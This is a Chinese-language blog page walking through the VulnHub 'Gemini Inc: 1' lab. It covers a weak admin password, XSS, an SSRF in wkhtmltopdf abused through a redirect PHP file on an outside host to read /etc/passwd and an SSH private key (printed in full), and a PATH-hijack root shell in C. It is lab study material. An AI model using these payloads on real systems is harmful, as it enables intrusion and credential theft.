  <!DOCTYPE html>
  <html lang="zh-CN"  
      data-theme-mode="auto"
  >
  <head>
  <meta charset="utf-8">
  
  
  
  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_a0oqhord1y';window.REIMU_CONFIG.clipboard_tips = {"success":{"zh-CN":"复制成功 (*^▽^*)"},"fail":{"zh-CN":"复制失败 (ﾟ⊿ﾟ)ﾂ"},"copyright":{"enable":false,"count":50,"license_type":"by-nc-sa"}};window.REIMU_CONFIG.clipboard_tips.copyright.content = '本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！';window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'http://example.com';</script>
  <title>
    VulnHub Gemini Inc：1 | 雾島风起時
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media='all'">
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_a0oqhord1y.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    
<link rel="stylesheet" href="/css/loader.css">

    <meta name="description" content="USV：2017项目地址：https:&#x2F;&#x2F;download.vulnhub.com&#x2F;geminiinc&#x2F;Gemini-Pentest-v1.zip 是一个打包好的镜像文件 注意：导入 vmx 时一定要选择我已移动，否则没网 使用 Nmap 扫描出开放服务及操作系统版本  弱口令Gemini Inc扫描目录发现有一个 &#x2F;test2  访问过去给了一个 GitHub 地址  拿到了项目源码  访问 8">
<meta property="og:type" content="article">
<meta property="og:title" content="VulnHub Gemini Inc：1">
<meta property="og:url" content="http://example.com/2026/04/23/Gemini%20Inc%201/index.html">
<meta property="og:site_name" content="雾島风起時">
<meta property="og:description" content="USV：2017项目地址：https:&#x2F;&#x2F;download.vulnhub.com&#x2F;geminiinc&#x2F;Gemini-Pentest-v1.zip 是一个打包好的镜像文件 注意：导入 vmx 时一定要选择我已移动，否则没网 使用 Nmap 扫描出开放服务及操作系统版本  弱口令Gemini Inc扫描目录发现有一个 &#x2F;test2  访问过去给了一个 GitHub 地址  拿到了项目源码  访问 8">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69e798a15e7b2d92c4b99ac5.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69eb529b673fb9750a2b6ddd.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69eb540e673fb9750a2b7238.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69eb567a673fb9750a2b78a4.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69e7a2315e7b2d92c4b99f47.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69eb5d14673fb9750a2bbb8e.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69eb5cdd673fb9750a2bba7e.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69e7a25a5e7b2d92c4b99f49.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69e7a39a5e7b2d92c4b99f67.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69e7a3cd5e7b2d92c4b99f8b.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec1b16673fb9750a2f6eec.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec1b80673fb9750a2f6f2d.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec1f53673fb9750a2f7081.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec1fcf673fb9750a2f70c4.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec2150673fb9750a2f8f3a.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec217b673fb9750a2f8f52.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec23db673fb9750a2f91e3.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec2449673fb9750a2f9201.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec2510673fb9750a2f932c.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec2573673fb9750a2f94d9.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec25c4673fb9750a2f9536.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec260f673fb9750a2f9552.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69ec2801673fb9750a2f96f7.png">
<meta property="article:published_time" content="2026-04-23T08:21:00.000Z">
<meta property="article:modified_time" content="2026-04-26T08:33:53.500Z">
<meta property="article:author" content="ALL">
<meta property="article:tag" content="SSRF">
<meta property="article:tag" content="XSS">
<meta property="article:tag" content="弱口令">
<meta property="article:tag" content="环境变量提权">
<meta property="article:tag" content="重定向绕过">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pic1.imgdb.cn/item/69e798a15e7b2d92c4b99ac5.png">
    <link rel="alternate" href="/atom.xml" title="雾島风起時" type="application/atom+xml">
    <link rel="shortcut icon" href="/images/favicon.ico">
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" integrity="sha384-IfxC36XL/toUyJ939C73PcgMuRzAZuIzZxE38drsmO5p6jD7ei+Zx/1oA/0l8ysE" crossorigin="anonymous">
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.2/dist/aos.css" integrity="sha384-GMRP93c6Hkz9JVKGAuRR3nTS7M07RwPgTFenXiosjq2VbVgvdDNcz1g6Mkj8AONa" crossorigin="anonymous">

<meta name="generator" content="Hexo 8.1.1"></head>

  <body>
      <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  <script>
    var time = null;
    var loaderEl = document.getElementById('loader');
    var startLoading = () => {
      time = Date.now();
      loaderEl.classList.remove("loading");
    }
    var hideLoader = () => {
      document.body.style.overflow = 'auto';
      loader.classList.add('loading');
    };

    var endLoading = () => {
      if (!time) {
        hideLoader();
      } else {
        if (Date.now() - time > 500) {
          time = null;
          hideLoader();
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    loaderEl.addEventListener('click', endLoading);
  </script>
<div id="copy-tooltip"></div>
<div id="heatmap-tooltip"></div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav" aria-label="Primary navigation">
        <a class="main-nav-link-wrap" href="/">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">首页</span>
        </a>
        <a class="main-nav-link-wrap" href="/archives">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">归档</span>
        </a>
        <a class="main-nav-link-wrap" href="/about">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">关于</span>
        </a>
        <a class="main-nav-link-wrap" href="/friend">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">友链</span>
        </a>
    <a id="main-nav-toggle" class="nav-icon" aria-label="Toggle navigation" role="button"></a>
  </nav>
  <nav id="sub-nav" aria-label="Secondary navigation">
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅" aria-label="RSS 订阅" target="_blank"></a>
  </nav>
</div>
<header id="header" aria-label="Site header">
        <picture>
        </picture>
          <img  fetchpriority="high" src="/images/banner.webp" alt="VulnHub Gemini Inc：1">
  <div id="header-outer">
    <div id="header-title">
          <span id="logo">
            <h1 data-aos="slide-up">VulnHub Gemini Inc：1</h1>
          </span>
        <h2 id="subtitle-wrap" data-aos="slide-down">
        </h2>
    </div>
  </div>
</header>

        <div id="content" aria-label="Page content"  class="sidebar-right" >
          <aside id="sidebar" aria-label="Sidebar">
  <div class="sidebar-wrapper-container sticky">
  <div class="sidebar-wrapper">
    <div class="sidebar-wrap" data-aos="fade-up">
          <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#USV%EF%BC%9A2017"><span class="toc-number">1.</span> <span class="toc-text">USV：2017</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%B1%E5%8F%A3%E4%BB%A4"><span class="toc-number">1.1.</span> <span class="toc-text">弱口令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Gemini-Inc"><span class="toc-number">1.1.1.</span> <span class="toc-text">Gemini Inc</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS"><span class="toc-number">1.2.</span> <span class="toc-text">XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Edit-info-of-admin"><span class="toc-number">1.2.1.</span> <span class="toc-text">Edit info of admin</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF"><span class="toc-number">1.3.</span> <span class="toc-text">SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Export-file%EF%BC%88CVE-2022-35583-%E9%87%8D%E5%AE%9A%E5%90%91%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-number">1.3.1.</span> <span class="toc-text">Export file（CVE-2022-35583 重定向绕过）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E5%8F%96"><span class="toc-number">1.4.</span> <span class="toc-text">提取</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SSH-%E5%AF%86%E9%92%A5%E6%B3%84%E9%9C%B2"><span class="toc-number">1.4.1.</span> <span class="toc-text">SSH 密钥泄露</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%8F%90%E6%9D%83"><span class="toc-number">1.4.2.</span> <span class="toc-text">环境变量提权</span></a></li></ol></li></ol></li></ol>
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="ALL" class="lazyload">
  <div class="sidebar-author-name">ALL</div>
  <div class="sidebar-description">雾島风起時の日常</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">58</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">11</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">113</div>
  </div>
</div>
<div class="sidebar-social" >
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/duckpigdog itemprop="url" target="_blank" aria-label="github" rel="noopener nofollow noreferrer"></a>
    </div>
    <div class="icon-bilibili sidebar-social-icon">
      <a href=https://space.bilibili.com/1337537884?spm_id_from=333.1007.0.0 itemprop="url" target="_blank" aria-label="bilibili" rel="noopener nofollow noreferrer"></a>
    </div>
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
</div>
</div>
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
    </div>
  </div>
  <div class="sidebar-widget">
  </div>
  </div>
</aside>

          <section id="main" aria-label="Main content"><article id="post-Gemini Inc 1" class="h-entry article" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link icon-calendar" data-aos="zoom-in">
    <time datetime="2026-04-23T08:21:00.000Z" itemprop="datePublished">2026-04-23</time>
    <time style="display: none;" id="post-update-time">2026-04-26</time>
  </span>
</div>

    </div>
    
    <div class="hr-line"></div>
    
    <div class="e-content article-entry" itemprop="articleBody">
        <h1 id="USV：2017"><a href="#USV：2017" class="headerlink" title="USV：2017"></a>USV：2017</h1><p>项目地址：<a target="_blank" rel="noopener" href="https://download.vulnhub.com/geminiinc/Gemini-Pentest-v1.zip">https://download.vulnhub.com/geminiinc/Gemini-Pentest-v1.zip</a></p>
<p>是一个打包好的镜像文件</p>
<p><strong>注意：导入 vmx 时一定要选择我已移动，否则没网</strong></p>
<p>使用 Nmap 扫描出开放服务及操作系统版本</p>
<p><img src="https://pic1.imgdb.cn/item/69e798a15e7b2d92c4b99ac5.png"></p>
<h2 id="弱口令"><a href="#弱口令" class="headerlink" title="弱口令"></a>弱口令</h2><h3 id="Gemini-Inc"><a href="#Gemini-Inc" class="headerlink" title="Gemini Inc"></a>Gemini Inc</h3><p>扫描目录发现有一个 <code>/test2</code></p>
<p><img src="https://pic1.imgdb.cn/item/69eb529b673fb9750a2b6ddd.png"></p>
<p>访问过去给了一个 GitHub 地址</p>
<p><img src="https://pic1.imgdb.cn/item/69eb540e673fb9750a2b7238.png"></p>
<p>拿到了项目源码</p>
<p><img src="https://pic1.imgdb.cn/item/69eb567a673fb9750a2b78a4.png"></p>
<p>访问 80 端口，点击 Login</p>
<p><img src="https://pic1.imgdb.cn/item/69e7a2315e7b2d92c4b99f47.png"></p>
<p>在初始化数据库的代码段中找到默认管理员账号</p>
<p><img src="https://pic1.imgdb.cn/item/69eb5d14673fb9750a2bbb8e.png"></p>
<p>破解 MD5</p>
<p><img src="https://pic1.imgdb.cn/item/69eb5cdd673fb9750a2bba7e.png"></p>
<p>弱口令 <code>admin/1234</code> 直接进去了</p>
<p><img src="https://pic1.imgdb.cn/item/69e7a25a5e7b2d92c4b99f49.png"></p>
<h2 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h2><h3 id="Edit-info-of-admin"><a href="#Edit-info-of-admin" class="headerlink" title="Edit info of admin"></a>Edit info of admin</h3><p>在后台编辑资料中尝试注入 XSS Payload</p>
<p><img src="https://pic1.imgdb.cn/item/69e7a39a5e7b2d92c4b99f67.png"></p>
<p>成功弹窗</p>
<p><img src="https://pic1.imgdb.cn/item/69e7a3cd5e7b2d92c4b99f8b.png"></p>
<h2 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h2><h3 id="Export-file（CVE-2022-35583-重定向绕过）"><a href="#Export-file（CVE-2022-35583-重定向绕过）" class="headerlink" title="Export file（CVE-2022-35583 重定向绕过）"></a>Export file（CVE-2022-35583 重定向绕过）</h3><p>在管理员的个人中心中，有一个导出功能</p>
<p><img src="https://pic1.imgdb.cn/item/69ec1b16673fb9750a2f6eec.png"></p>
<p>可以将管理员信息导出为 PDF</p>
<p><img src="https://pic1.imgdb.cn/item/69ec1b80673fb9750a2f6f2d.png"></p>
<p>在导出的 PDF 文件中，查看到了该组件的名称以及版本</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wkhtmltopdf 0.12.4</span><br></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/69ec1f53673fb9750a2f7081.png"></p>
<p>搜索发现存在 SSRF 漏洞，在存在 XSS 的输入点，注入一个 HTML 标签，让引擎尝试加载攻击者控制的远程资源</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">&quot;file:///etc/passwd&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/69ec1fcf673fb9750a2f70c4.png"></p>
<p>不过导出后没有发现 <code>/etc/passwd</code> 文件的内容</p>
<p>尝试看能不能打远程</p>
<p><img src="https://pic1.imgdb.cn/item/69ec2150673fb9750a2f8f3a.png"></p>
<p>可以明显看到支持远程请求</p>
<p><img src="https://pic1.imgdb.cn/item/69ec217b673fb9750a2f8f52.png"></p>
<p>既然能支持远程请求，那么我们可以利用重定向绕过</p>
<p>手动创建一个 302 PHP 文件，将其重定向到 <code>file:///etc/passwd</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">header</span>(<span class="string">&#x27;location:file://&#x27;</span>.<span class="variable">$_REQUEST</span>[<span class="string">&#x27;url&#x27;</span>]); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>标签这么写</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">height</span>=<span class="string">&quot;2000&quot;</span> <span class="attr">width</span>=<span class="string">&quot;800&quot;</span> <span class="attr">src</span>=<span class="string">http://192.168.110.128:8080/302.php?url</span>=<span class="string">/etc/passwd</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/69ec23db673fb9750a2f91e3.png"></p>
<p>成功读取到文件内容</p>
<h2 id="提取"><a href="#提取" class="headerlink" title="提取"></a>提取</h2><h3 id="SSH-密钥泄露"><a href="#SSH-密钥泄露" class="headerlink" title="SSH 密钥泄露"></a>SSH 密钥泄露</h3><p>发现有个用户 gemini1</p>
<p><img src="https://pic1.imgdb.cn/item/69ec2449673fb9750a2f9201.png"></p>
<p>尝试读取该用户 <code>/home/gemini1/.ssh/id_rsa</code> 私钥</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">-----BEGIN RSA PRIVATE KEY-----</span><br><span class="line">MIIEpQIBAAKCAQEAv8sYkCmUFupwQ8pXsm0XCAyxcR6m5y9GfRWmQmrvb9qJP3xs</span><br><span class="line">6c11dX9Mi8OLBpKuB+Y08aTgWbEtUAkVEpRU+mk+wpSx54OTBMFX35x4snzz+X5u</span><br><span class="line">Vl1rUn9Z4QE5SJpOvfV3Ddw9zlVA0MCJGi/RW4ODRYmPHesqNHaMGKqTnRmn3/4V</span><br><span class="line">u7cl+KpPZmQJzASoffyBn1bxQomqTkb5AGhkAggsOPS0xv6P2g/mcmMUIRWaTH4Z</span><br><span class="line">DqrpqxFtJbuWSszPhuw3LLqAYry0RlEH/Mdi2RxM3VZvqDRlsV0DO74qyBhBsq+p</span><br><span class="line">oSbdwoXao8n7oO2ASHc05d2vtmmmGP31+4pjuQIDAQABAoIBAQCq+WuJQHeSwiWY</span><br><span class="line">WS46kkNg2qfoNrIFD8Dfy0ful5OhfAiz/sC84HrgZr4fLg+mqWXZBuCVtiyF6IuD</span><br><span class="line">eMU/Tdo/bUkUfyflQgbyy0UBw2RZgUihVpMYDKma3oqKKeQeE+k0MDmUsoyqfpeM</span><br><span class="line">QMc3//67fQ6uE8Xwnu593FxhtNZoyaYgz8LTpYRsaoui9j7mrQ4Q19VOQ16u4XlZ</span><br><span class="line">rVtRFjQqBmAKeASTaYpWKnsgoFudp6xyxWzS4uk6BlAom0teBwkcnzx9fNd2vCYR</span><br><span class="line">MhK5KLTDvWUf3d+eUcoUy1h+yjPvdDmlC27vcvZ0GXVvyRks+sjbNMYWl+QvNIZn</span><br><span class="line">1XxD1nkxAoGBAODe4NKq0r2Biq0V/97xx76oz5zX4drh1aE6X+osRqk4+4soLauI</span><br><span class="line">xHaApYWYKlk4OBPMzWQC0a8mQOaL1LalYSEL8wKkkaAvfM604f3fo01rMKn9vNRC</span><br><span class="line">1fAms6caNqJDPIMvOyYRe4PALNf6Yw0Hty0KowC46HHkmWEgw/pEhOZdAoGBANpY</span><br><span class="line">AJEhiG27iqxdHdyHC2rVnA9o2t5yZ7qqBExF7zyUJkIbgiLLyliE5JYhdZjd+abl</span><br><span class="line">aSdSvTKOqrxscnPmWVIxDyLDxemH7iZsEbhLkIsSKgMjCDhPBROivyQGfY17EHPu</span><br><span class="line">968rdQsmJK8+X5aWxq08VzlKwArm+GeDs2hrCGUNAoGAc1G5SDA0XNz3CiaTDnk9</span><br><span class="line">r0gRGGUZvU89aC5wi73jCttfHJEhQquj3QXCXM2ZQiHzmCvaVOShNcpPVCv3jSco</span><br><span class="line">tXLUT9GnoNdZkQPwNWqf648B6NtoIA6aekrOrO5jgDks6jWphq9GgV1nYedVLpR7</span><br><span class="line">WszupOsuwWGzSr0r48eJxD0CgYEAo23HTtpIocoEbCtulIhIVXj5zNbxLBt55NAp</span><br><span class="line">U2XtQeyqDkVEzQK4vDUMXAtDWF6d5PxGDvbxQoxi45JQwMukA89QwvbChqAF86Bk</span><br><span class="line">SwvUbyPzalGob21GIYJpi2+IPoPktsIhhm4Ct4ufXcRUDAVjRHur1ehLgl2LhP+h</span><br><span class="line">JAEpUWkCgYEAj2kz6b+FeK+xK+FUuDbd88vjU6FB8+FL7mQFQ2Ae9IWNyuTQSpGh</span><br><span class="line">vXAtW/c+eaiO4gHRz60wW+FvItFa7kZAmylCAugK1m8/Ff5VZ0rHDP2YsUHT4+Bt</span><br><span class="line">j8XYDMgMA8VYk6alU2rEEzqZlru7BZiwUnz7QLzauGwg8ohv1H2NP9k=</span><br><span class="line">-----END RSA PRIVATE KEY-----</span><br></pre></td></tr></table></figure>

<p>成功连接上该用户</p>
<p><img src="https://pic1.imgdb.cn/item/69ec2510673fb9750a2f932c.png"></p>
<h3 id="环境变量提权"><a href="#环境变量提权" class="headerlink" title="环境变量提权"></a>环境变量提权</h3><p>查找属于 root 账号且有 suid 权限的可执行文件的时候，发现了 <code>listinfo</code> 命令</p>
<p><img src="https://pic1.imgdb.cn/item/69ec2573673fb9750a2f94d9.png"></p>
<p>查看说明文档</p>
<p><img src="https://pic1.imgdb.cn/item/69ec25c4673fb9750a2f9536.png"></p>
<p>提取可疑字符串</p>
<p><img src="https://pic1.imgdb.cn/item/69ec260f673fb9750a2f9552.png"></p>
<p>前三条命令都写的绝对路径，但是第四条命令 <code>date</code> 却没有写路径，所以可以利用这一点实现 Linux 环境变量提权</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line">​</span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    setuid(<span class="number">0</span>);</span><br><span class="line">    setgid(<span class="number">0</span>);</span><br><span class="line">    system(<span class="string">&quot;/bin/bash&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译文件并命名编译后的文件名为 date</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc date.c -o <span class="built_in">date</span></span><br></pre></td></tr></table></figure>

<p><img src="https://pic1.imgdb.cn/item/69ec2801673fb9750a2f96f7.png"></p>

    </div>
    <footer class="article-footer">
        <a class="article-category-link" href="/categories/VulnHub/" title="VulnHub" data-aos="zoom-in">VulnHub</a>

        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/SSRF/" rel="tag" title="SSRF">SSRF</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/XSS/" rel="tag" title="XSS">XSS</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E5%BC%B1%E5%8F%A3%E4%BB%A4/" rel="tag" title="弱口令">弱口令</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%8F%90%E6%9D%83/" rel="tag" title="环境变量提权">环境变量提权</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E9%87%8D%E5%AE%9A%E5%90%91%E7%BB%95%E8%BF%87/" rel="tag" title="重定向绕过">重定向绕过</a></li></ul>

    </footer>
  </div>
    <nav id="article-nav" aria-label="Article navigation" data-aos="fade-up">
      <div class="article-nav-link-wrap left">
            <img data-src="/images/banner.webp" data-sizes="auto" alt="知攻善防实验室 Windows 应急响应-近源渗透" class="lazyload">
        <a href="/2026/04/25/%E7%9F%A5%E6%94%BB%E5%96%84%E9%98%B2%E5%AE%9E%E9%AA%8C%E5%AE%A4%20Windows%20%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94-%E8%BF%91%E6%BA%90%E6%B8%97%E9%80%8F/" aria-label="前一篇: 知攻善防实验室 Windows 应急响应-近源渗透" title="前一篇: 知攻善防实验室 Windows 应急响应-近源渗透"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
            知攻善防实验室 Windows 应急响应-近源渗透
        </h3>
      </div>
    <div class="article-nav-link-wrap right">
          <img data-src="/images/banner.webp" data-sizes="auto" alt="VulnHub Homeless：1" class="lazyload">
      <a href="/2026/04/20/Homeless%201/" aria-label="后一篇: VulnHub Homeless：1"  title="后一篇: VulnHub Homeless：1"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
          VulnHub Homeless：1
      </h3>
    </div>
  </nav>

</article>


</section>
        </div>
        <footer id="footer" aria-label="Site footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    <div>
      <span class="icon-copyright"></span>
        2020-2026
        <span class="footer-info-sep rotate"></span>
      ALL
    </div>
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener nofollow noreferrer" target="_blank">Reimu</a>
      </div>
      <div>
        <span class="icon-brush"></span>
        59.4k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        05:06
      </div>
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
  </div>
</footer>

          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav" aria-label="Mobile navigation">
  <div class="sidebar-wrap">
